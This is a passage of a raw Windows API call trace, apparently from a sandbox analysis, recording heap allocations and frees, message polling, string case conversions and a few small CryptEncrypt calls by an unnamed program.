[0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.757] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.757] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.757] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0207.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.758] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.758] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.758] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.759] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.759] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.759] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0207.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.762] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.763] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0207.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.768] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.768] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.768] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.768] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.768] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.768] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.769] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b18f8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b18f8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0207.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.769] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.769] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.769] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.769] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.769] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.769] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.770] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0207.770] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0207.770] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.771] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.771] CryptDestroyKey (hKey=0xaa5860) returned 1 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.771] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.771] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.771] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.771] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.771] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.771] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.772] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.772] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.772] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.772] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.772] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.772] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.772] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.772] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.772] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0207.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.772] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 